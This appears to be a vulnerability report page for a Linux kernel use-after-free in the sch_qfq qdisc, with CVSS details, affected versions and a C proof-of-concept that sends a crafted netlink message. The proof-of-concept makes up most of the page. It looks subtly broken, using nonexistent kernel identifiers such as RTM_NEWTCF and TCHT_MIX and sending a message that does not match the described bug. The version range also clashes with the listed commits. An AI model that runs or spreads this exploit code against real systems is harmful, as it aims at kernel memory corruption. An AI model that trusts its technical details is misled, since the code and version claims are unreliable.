Security Vulnerability Report
CVE-2026-22999 CVSS 7.8 HIGH

Published: 2026-01-25 15:15:55
Last Modified: 2026-04-27 14:16:29
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net/sched: sch_qfq: do not free existing class in qfq_change_class()

Fixes qfq_change_class() error case.

cl->qdisc and cl should only be freed if a new class and qdisc were allocated, or we risk various UAF.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.15.x (specific commits: 0a234660dc70, 2a64fb9b47af, 362e269bb03f, 3879cffd9d07, cff6cd703f41)
The Linux kernel net/sched sch_qfq module is affected in specific version ranges
Kernel versions with CONFIG_NET_SCH_QFQ enabled

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-22999 PoC - Linux kernel sch_qfq UAF vulnerability
 * For educational and security research purposes only.
 * Compile: gcc -o cve202622999 cve202622999.c -lmnl
 * Usage: ./cve202622999 <interface>
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <net/if.h>
#include <linux/netlink.h>
#include <linux/tc_ematch/tc_em_ipt.h>
#include <linux/pkt_cls.h>
#include <libmnl/libmnl.h>

#define TCA_QFQ_INIT 28

int send_qfq_netlink_msg(const char *ifname)
{
    struct mnl_socket *nl;
    char buf[MNL_SOCKET_BUFFER_SIZE];
    struct nlmsghdr *nlh;
    struct tcmsg *tcm;
    unsigned int ifindex;

    ifindex = if_nametoindex(ifname);
    if (!ifindex) {
        fprintf(stderr, "[-] Invalid interface: %s\n", ifname);
        return -1;
    }

    nl = mnl_socket_open(NETLINK_ROUTE);
    if (!nl) {
        perror("[-] mnl_socket_open");
        return -1;
    }

    if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("[-] mnl_socket_bind");
        return -1;
    }

    nlh = mnl_nlmsg_put_header(buf);
    nlh->nlmsg_type = RTM_NEWTCF;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL;
    nlh->nlmsg_seq = time(NULL);

    tcm = mnl_nlmsg_put_extra_header(nlh, sizeof(*tcm));
    tcm->tcm_family = AF_UNSPEC;
    tcm->tcm_ifindex = ifindex;
    tcm->tcm_handle = 0x00010001;
    tcm->tcm_parent = TC_H_ROOT;
    tcm->tcm_info = TC_H_MAKE(TCHT_MIX, TCA_QFQ_INIT);

    // Trigger error path in qfq_change_class
    // by sending malformed qfq class configuration
    struct rtattr *rta = mnl_nlmsg_put_extra_header(nlh, RTA_SPACE(64));
    rta->rta_type = TCA_OPTIONS;

    printf("[*] Sending crafted netlink message to trigger UAF...\n");
    if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) {
        perror("[-] mnl_socket_sendto");
        return -1;
    }

    mnl_socket_close(nl);
    printf("[+] Netlink message sent, check system stability.\n");
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <interface>\n", argv[0]);
        return 1;
    }

    printf("[*] CVE-2026-22999 PoC - sch_qfq qdisc UAF\n");
    return send_qfq_netlink_msg(argv[1]);
}

References

Raw JSON Data
